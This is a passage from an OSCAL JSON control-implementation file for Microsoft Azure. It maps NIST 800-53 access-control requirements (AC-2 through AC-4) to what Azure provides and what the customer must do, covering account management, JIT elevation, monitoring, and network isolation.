The AAA system logs AAA administration actions, which include account creation, modification, and disablement."}],"responsibilities":[{"uuid":"bcd46c63-3f67-42a5-86c1-e14ae8a5ef2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-025"}],"description":"The customer is responsible for implementing an automated audit and notification system for the lifecycle of customer-controlled accounts.","provided-uuid":"15b30bb1-274d-42f8-afc5-aab2a72d3c4a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"44dc34da-41e7-4b0b-a736-f1327751c77a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.5","statements":[{"uuid":"c9183545-15f0-4e32-9693-a44bcc5811e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.5_smt","by-components":[{"uuid":"d8e97426-3f45-4e00-ae14-ae7815630b98","export":{"provided":[{"uuid":"fc24a4db-1e13-413a-b71e-a6ffd5a8e27a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-026"}],"description":"Azure requires that all personnel log out when they have completed the task that was the purpose of the login, before any expected unattended inactivity exceeding fifteen (15) minutes, and at the end of their workday. 
Additionally, when a user has been elevated to administrative access using the JIT process, that user's connections are automatically terminated upon expiration of the elevation."}],"responsibilities":[{"uuid":"583e221e-4af4-49e0-b5d1-c9f43af92b8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-026"}],"description":"The customer is responsible for defining and enforcing an inactivity logout policy.","provided-uuid":"fc24a4db-1e13-413a-b71e-a6ffd5a8e27a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"22fc4666-f481-47b1-ace2-4f9b788a9c93","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.7","statements":[{"uuid":"c80df443-8597-4185-98ba-40ddbfce7024","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.a","by-components":[{"uuid":"41a96ebf-c733-4509-a018-c22f3169e313","export":{"provided":[{"uuid":"2cfc668c-902e-49fd-9b6c-390f53927713","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-027"}],"description":"Administrative access within Azure is granted either through the JIT process, which grants temporary administrative access through AD security groups, subscription roles, and temporary accounts created with RBAC permissions applied, or through emergency access accounts, which also use AD security groups for administrative access but raise Severity 2 alerts when used. 
Using these methods, Azure personnel establish elevated access in accordance with a role-based access scheme, which organizes information system privileges into roles that are assigned to AD security groups of which users become a member.\n\nFor the persistent accounts that are exceptions to the JIT and emergency access implementations, any group membership action that provides elevated persistent access to Azure is provisioned only after explicit approval by asset owners based on the role of the requestor. This access restriction is strictly enforced via security groups, where security group owners approve additions to a security group based on the business justification and role of the user."}],"responsibilities":[{"uuid":"9225d923-f9d0-4beb-831c-c49e2b8a6c78","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-027"}],"description":"The customer is responsible for administering privileged user accounts using a role-based access scheme (for customer-controlled accounts). Microsoft considers all customer users to be non-privileged for the purposes of Azure system operations. 
**Customer Identity Federation** Federal user entities are responsible for enforcing RBAC within their own Active Directory infrastructure and monitoring those role assignments to meet internal requirements.","provided-uuid":"2cfc668c-902e-49fd-9b6c-390f53927713"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"109f3af3-1784-4561-a325-89bbf8689557","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.b","by-components":[{"uuid":"b96bfc14-e266-4c8b-8b6e-ec4cbc2afe80","export":{"provided":[{"uuid":"76c4ce5f-0caf-495b-83db-ab6986dd9090","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-028"}],"description":"Access requests to all AD security groups are tracked and managed through the automated workflow management of OneIdentity and MyAccess. These tools track the process of security group access request, approval, creation, modification, and deletion for Azure roles.\n\nAll Azure production accounts are tracked and monitored using the automated account management tools, including OneIdentity, MyAccess, and JIT; audit event collection and reporting; and administrative access audit reviews. 
Accounts are granted access to production systems based on roles defined to limit the access to the systems and privileges needed for the administrator to complete their job.\n\nAzure tracks and monitors elevated role assignments at access approval for JIT, upon execution for emergency access accounts, and when persistent access is requested as an exception to JIT and emergency access. Azure also executes a quarterly review for all accounts, disabling those identified as unnecessary."}],"responsibilities":[{"uuid":"fc778e53-4683-4b48-8afb-6308f34ce2b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-028"}],"description":"The customer is responsible for monitoring privileged roles of customer-controlled accounts.","provided-uuid":"76c4ce5f-0caf-495b-83db-ab6986dd9090"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"602e5d31-8b66-493c-ba2c-5d56a38eb20a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.c","by-components":[{"uuid":"3b4a206b-6685-42c0-a120-cb382c466f6e","export":{"provided":[{"uuid":"0e346125-792e-4650-a80f-5a3151fc2e52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-029"}],"description":"Access requests to all AD security groups are tracked and managed by OneIdentity, MyAccess, and CoreIdentity. These tools track the process of security group access request, approval, creation, modification, and deletion for Azure identities. 
All Azure production accounts are tracked and monitored using the automated account management tools, including OneIdentity, MyAccess, CoreIdentity, and JIT; audit event collection and reporting; and administrative access audit reviews. Accounts are granted access to production systems based on roles defined to limit the access to the services and privileges needed for the administrator to complete their job. Azure tracks and monitors elevated role assignments at access approval for JIT, upon execution for Break-Glass accounts, and when persistent access is requested as an exception to JIT and Break-Glass. Azure also executes a quarterly review for all accounts, disabling those identified as unnecessary."}],"responsibilities":[{"uuid":"0e56c697-2f24-4527-9295-b16c188c7088","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-029"}],"description":"The customer is responsible for monitoring elevated roles of customer-controlled accounts.","provided-uuid":"0e346125-792e-4650-a80f-5a3151fc2e52"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"229e786e-3f29-41d2-805d-ca63cf6bbbd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.d","by-components":[{"uuid":"94ddcd2d-470f-4cc3-ad35-9cd6eb0ae7b7","export":{"provided":[{"uuid":"ff6c3c04-7511-4636-b95f-53f9f6b8516a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-030"}],"description":"Elevated role assignments are no longer appropriate when Azure personnel no 
longer need the administrative access to accomplish their task, their allotted JIT time expires, or the personnel are transferred or terminated. In those cases, Azure follows the account management processes to terminate the account or revoke access."}],"responsibilities":[{"uuid":"42da2e9e-a6d0-4530-97bd-e184e3d60ebc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-030"}],"description":"The customer is responsible for acting on customer-controlled accounts when elevated role assignments are no longer appropriate.","provided-uuid":"ff6c3c04-7511-4636-b95f-53f9f6b8516a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8074ee7c-1014-4998-b050-3b1497e00674","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.9","statements":[{"uuid":"a371c95b-ef9d-4a84-a724-dd9341a519f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-031"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-2.9_smt","by-components":[{"uuid":"ffce8fca-5db7-45a7-b4d8-96bc48be5ba9","export":{"provided":[{"uuid":"ce57edaf-bce7-4477-8452-d1041fa80bc4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-031"}],"description":"Group or shared accounts are not utilized within Azure unless necessary, such as where a local account cannot be deleted or disabled, or where the account is necessary for emergency access. 
For accounts tracked as approved exceptions, the credentials for these accounts are stored in an approved secret management store, which tracks and monitors access to secrets and ensures group or shared account usage is uniquely attributable to the user accessing it by associating the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is identified uniquely, ensuring non-repudiation and attributing activity performed with the shared account to that user."}],"responsibilities":[{"uuid":"ade87b76-78e3-4b6f-a6d9-fe84797f4750","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-031"}],"description":"The customer is responsible for restricting the use of customer-controlled shared/group accounts.","provided-uuid":"ce57edaf-bce7-4477-8452-d1041fa80bc4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"eac2f68f-5b12-4e17-bfab-7616d6ab39b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.11","statements":[{"uuid":"e3f1f3e2-6569-4864-924e-dd2cc2ea26ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-032"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-2.11_smt","by-components":[{"uuid":"fbeb02f1-29d8-4c37-b389-68c0c4ab9cd1","export":{"provided":[{"uuid":"ccc22e4f-3d8d-4c87-bd77-48a060c8e404","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-032"}],"description":"Azure operates twenty-four (24) hours a day, seven (7) days a week, 
and as such, does not apply usage conditions or restrictions for any Azure accounts."}],"responsibilities":[{"uuid":"829efce8-3320-47bf-90d4-4797d8994139","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-032"}],"description":"The customer is responsible for enforcing the appropriate usage of all customer-controlled accounts within the system.","provided-uuid":"ccc22e4f-3d8d-4c87-bd77-48a060c8e404"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2530c7c0-8083-41a5-bc95-73f9954284d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.12","statements":[{"uuid":"5cc0c285-bf9a-47e2-bdf3-842df5c134cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.12_smt.a","by-components":[{"uuid":"ce43738d-010b-4412-8883-9f4541e3be5d","export":{"provided":[{"uuid":"2d634f75-ed95-4802-96bc-ef2362bec0fc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-033"}],"description":"Azure monitors for atypical use by watching for the indications of compromise identified in the Incident Management SOP."}],"responsibilities":[{"uuid":"f0d038da-5e06-41c3-82f3-974fcf9499d8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-033"}],"description":"The customer is responsible for monitoring customer-controlled accounts for atypical 
usage.","provided-uuid":"2d634f75-ed95-4802-96bc-ef2362bec0fc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2c9ca7d3-2e12-4c90-9507-203c8ae4da49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.12_smt.b","by-components":[{"uuid":"eeeab4ca-ec69-4fd9-ae47-9bd6ee48f53b","export":{"provided":[{"uuid":"082a6fa1-27fe-4825-9c76-f5a908a2aa07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-034"}],"description":"Azure follows normal incident reporting procedures if atypical use is detected, including reporting to the Security Response Team and ISSO/ISSM as necessary."}],"responsibilities":[{"uuid":"978a1878-c5b8-4856-9eab-45c79c00c557","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-034"}],"description":"The customer is responsible for reporting atypical behavior of customer-controlled accounts.","provided-uuid":"082a6fa1-27fe-4825-9c76-f5a908a2aa07"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c50e9b19-8be6-42bc-bd8d-5633defaa488","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.13","statements":[{"uuid":"1eaf5e04-8fb6-49e8-ad3e-5f53ab5d37c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.13_smt","by-components":[{"uuid":"5ed0c386-03a8-444c-aabf-96d041fa4504","export":{"provided":[{"uuid":"f04b1767-e63a-4128-b7a2-d03469edc6eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-035"}],"description":"Active monitoring tools include the Geneva Monitoring Agent (MA), System Center Operations Manager (SCOM), and Kusto. Audit records for each Azure service are captured by the MA and retained in Azure Storage. The MA aggregates monitoring information for review. SCOM provides file integrity validation and protection, as well as the recovery of core system files if any unauthorized changes are detected. Kusto consolidates all available logs.\n\nThese tools are configured to provide near-real-time alerts to service team or Security Response Team personnel in situations that require immediate action. Microsoft documents the indications of compromise or potential compromise in the Incident Management SOP. Azure follows normal incident reporting procedures if atypical usage is detected. 
Per the new hire orientation process, users who are discovered to pose a significant risk to Microsoft are terminated and their access is revoked from Microsoft networks, including Azure. For involuntary terminations, an urgent request for access termination is submitted via email from HR and access is disabled within four (4) hours."}],"responsibilities":[{"uuid":"3636718b-45d2-4de9-ba0e-7cddbc86b33f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-035"}],"description":"The customer is responsible for disabling customer-controlled accounts of users posing a significant risk.","provided-uuid":"f04b1767-e63a-4128-b7a2-d03469edc6eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9a835063-de35-4d8d-99f2-e7529f33bca9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-3","statements":[{"uuid":"3297bcac-fbb8-4d1a-ba03-8cd7d9a4ce9e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-3_smt","by-components":[{"uuid":"d39c1231-5266-44e8-9e61-c0c094ba1fa6","export":{"provided":[{"uuid":"8b7bbfbf-51e0-474b-89ec-56516f866de3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-036"}],"description":"Azure enforces approved authorizations for logical access to the Azure environment using role-based access control enforced by Active Directory. 
Access to Active Directory security groups is managed through OneIdentity and MyAccess. Only screened personnel can access services in the Azure environment.\n\nAll accounts created in support of Azure are role-based. Service team users request access to Azure, and if approved, are placed in the appropriate security groups according to their roles for supporting their services, using the principles of least privilege.\n\nBy default, accounts do not have persistent elevated permissions to the production environment. If an Azure user needs access to the production environment to perform a specific action, they request temporary Just in Time (JIT) access through the JIT portal. Approval is granted either automatically using preconfigured rules or by a different Azure user with the access approver role. Access is only provided for a finite period based on the expected duration of the work to be performed. If access is approved, the user is assigned the minimum permissions required to perform the work, and permission is automatically revoked at the end of the specified time."}],"responsibilities":[{"uuid":"4cb25c45-50fb-4465-aea7-8be43c810910","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-036"}],"description":"The customer is responsible for enforcing approved authorizations for logical access to customer-deployed resources. Government customers are responsible for enforcing approved authorizations for logical access to the system, in compliance with their organizational policies, using their Active Directory (AD) infrastructure. Government users authenticate to government-owned ADFS servers, which use the government AD infrastructure to identify, authenticate, and apply permissions to that user's session. The government ADFS server then communicates that identification/authentication and the associated permissions to AAD via a SAML 2.0 assertion. 
Once permissions are communicated to AAD, AAD is responsible for enforcing those permissions for the user's O365 MT session. For information regarding how to manage user accounts in Active Directory, see TechNet article #754661: http://technet.microsoft.com/en-us/library/cc754661.aspx.","provided-uuid":"8b7bbfbf-51e0-474b-89ec-56516f866de3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e8204cae-c2f6-43f3-acd4-4d3c3110dced","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-4","statements":[{"uuid":"89ffc5ad-456f-4c68-af54-2bd843beceaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-4_smt","by-components":[{"uuid":"c43a3ad2-5d75-4629-a8ff-dbba7bc00ac8","export":{"provided":[{"uuid":"baaaaac0-07c4-4927-a11b-8a6e38ef180c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-037"}],"description":"Azure enforces approved authorizations for controlling the flow of information within the system and between interconnected systems by using the following features and controls.\n\nVLAN Isolation\n\nThe Azure environment is logically segregated using software Virtual Local Area Networks (VLANs) to separate customer traffic from the rest of the Azure and Microsoft networks. 
The Azure environment in any datacenter is logically segregated into three primary VLANs - the Universal Fabric Controller (UFC) VLAN, the Fabric Controller (FC) VLAN, and a main VLAN that houses the rest of the components including the VMs and storage. Customer data sits behind the main VLAN and is segregated from other customers' data. A brief description of each VLAN is below:\n* UFC VLAN - Used for communication between the UFC and FCs\n* FC VLAN - Used for communication between FCs and other network devices\n* Main VLAN - Used for customer VMs and FCs\n\nVLANs partition a network such that no communication is possible between VLANs without passing through a router. This prevents a compromised asset from faking traffic from outside its VLAN and from eavesdropping on traffic that is not to or from its VLAN. VLANs and ACLs restrict network communications by source and destination IP addresses, protocols, and port numbers. Communication is permitted from the FC VLAN to the main VLAN but cannot be initiated from the main VLAN to the FC VLAN, protecting the fabric from customers.\n\nBecause the FC is the central orchestrator of much of the Azure infrastructure, significant controls are in place to mitigate threats to FCs, especially from potentially compromised Azure VMs within customer applications. FCs do not recognize any hardware whose device information, such as a MAC address, is not pre-loaded in the FC. The DHCP servers on the FC have configured lists of MAC addresses of the assets they are willing to boot. Even if unauthorized assets are connected, they are not incorporated into the Fabric inventory. This reduces the risk of unauthorized assets communicating with the FC and gaining access to the VLAN.\n\nSoftware Load Balancers\n\nAccess to the Azure environment from outside the cluster is restricted through Software Load Balancers (SLBs). 
The SLB is a networking device that accepts internet traffic coming into Azure and forwards it to an appropriate internal IP address and port within the Fabric. In the common case where there are several different machines or VMs that can handle a given request, the SLB allocates the connections in a way that balances the load among them. The SLB routing tables are updated as VMs are created, deleted, and moved from one piece of hardware to another.\n\nVirtual Filtering Platform (VFP) Filter\n\nThe Virtual Filtering Platform (VFP) Filter component in the Host OS isolates the Host OS from the Guest VMs and the Guest VMs from one another. It performs filtering of traffic to restrict communication between tenants' assets and the internet based on the customer's service configuration, segregating them from other tenants. The VFP Filter component on the VM allows passage of only those packets called out in the configuration documents of those VMs.\n\nCustomers must explicitly open ports on their role instances by configuring the port number in their Service Definition file. No port is open by default unless explicitly configured by the customer in the service definition. Once configured, the FC automatically updates the network traffic rule sets on the VFP Filter as well as on the SLB to allow external traffic only through the designated ports.\n\nIn addition, there is a VFP Filter on each customer VM for which the customer is responsible for configuring the range of IP addresses authorized to access the customer environment.\n\nFirewall\n\nFor scalability and reliability in a hyperscale environment, Azure does not implement a traditional firewall architecture at the perimeter between external environments and Azure internal components, but achieves the same effect using a series of firewalls at the OS layer, including a host firewall, hypervisor firewall, and VM firewall. 
All infrastructure components are assigned IP addresses that are Dedicated IPs (DIPs) allocated from non-routable address space. Therefore, an attacker on the internet cannot route traffic to those addresses, as they do not reach Azure. In the unlikely event the attacker was able to route traffic to those addresses, the Azure Gateway routers filter all packets addressed to internal addresses so they do not enter the network. The only components that accept traffic directed to Virtual IPs (VIPs) are the Azure software load balancers.\n\nAccess Control Lists (ACLs)\n\nAzure only allows connections and communication which are necessary to allow systems to operate, blocking all other ports, protocols and connections by default, as defined in Microsoft's Online Services Network Security Standard. Access Control Lists (ACLs) are the preferred mechanism to restrict network communications by source and destination networks, protocols, and port numbers. Approved mechanisms to implement network-based ACLs include: tiered ingress ACLs on routers managed by Azure Networking, IPSec policies applied to hosts to restrict communications when used in conjunction with tiered ACLs, network firewall rules, and host-based firewall rules.\n\nCertain communications as defined in the Firewall Rule and Tiered ACL Guidelines are pre-approved and therefore permitted without requiring further review by online services security. The Firewall Rule and Tiered ACL Guidelines define the ingress and egress ACLs specifying the approved protocols and ports for each key connection point based upon the asset classification of the data. 
Azure requires all ACLs involving ingress and egress ports other than those listed within the Firewall Rule and Tiered ACL Guidelines to obtain approval through the Security Review Process prior to implementation.\n\nApplications\n\nFor data flowing between application components, service teams control input by using an input validation method stipulated by Microsoft's Security Development Lifecycle (SDL) process, further detailed in the CM and SA families of controls. Input validation testing includes regulating data inputs by size, formation, and structure prior to allowing information to reach the underlying database. The backend services and servers receive only pre-validated inputs from the front-end webservers. The backend is not directly accessible, from an application data flow perspective, in any other method."}],"responsibilities":[{"uuid":"1108d6ab-a7f2-48aa-bd98-4d3759f0d8f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-037"}],"description":"The customer is responsible for controlling the flow of information within customer-deployed resources and between interconnected systems.","provided-uuid":"baaaaac0-07c4-4927-a11b-8a6e38ef180c"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e311e3e9-e111-4db3-ae51-33492708961e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-4.4","statements":[{"uuid":"9acf5797-c9a9-4488-89f9-94177c9bbe22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-038"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-4.4_smt","by-components":[{"uuid":"5ac66944-8302-404c-a210-562b74939a9d","export":{"provided":[{"uuid":"1d71ae9f-653d-4da7-8008-029941515502","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-038"}],"description":"Azure does not monitor or examine customer data by design. 
The customer is fully responsible for ensuring they can monitor and content-check their encrypted information."}],"responsibilities":[{"uuid":"bd6d686c-43fb-45c1-9fb6-29cb173f7331","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-038"}],"description":"The customer is responsible for preventing encrypted information from bypassing content-checking mechanisms by (one or more): decrypting the information; blocking the flow of the encrypted information; terminating communications sessions attempting to pass encrypted information; organization-defined procedure or method.","provided-uuid":"1d71ae9f-653d-4da7-8008-029941515502"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a2d755ab-ed25-4103-a67b-b04a17304734","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-4.21","statements":[{"uuid":"a959a3a0-867d-4317-b824-bf206db7561e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-4.21_smt","by-components":[{"uuid":"18c05bd7-d17e-46d5-ba6c-010d29e30157","export":{"provided":[{"uuid":"72d3e905-efb7-45bf-811e-974c1a68105c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-039"}],"description":"Azure logically separates information flows using ACLs. ACLs are the preferred mechanism to restrict network communications by source and destination networks, protocols, and port numbers. 
Approved mechanisms to implement network-based ACLs include: tiered ACLs on routers managed by Azure Networking, IPSec policies applied to hosts to restrict communications when used in conjunction with tiered ACLs, network firewall rules, and host-based firewall rules.\n\nAdditionally, Azure separates all information flows logically using user session encryption. TLS ensures the confidentiality and integrity of each flow; only the intended recipient can decrypt information.\n\nFor data flowing between application components, service teams control input by using an input validation method stipulated by Microsoft's Security Development Lifecycle (SDL) process, further detailed in the CM and SA families of controls. Input validation testing includes regulating data inputs by size, formation, and structure prior to allowing information to reach the underlying database. The backend services and servers receive only pre-validated inputs from the front-end webservers. 
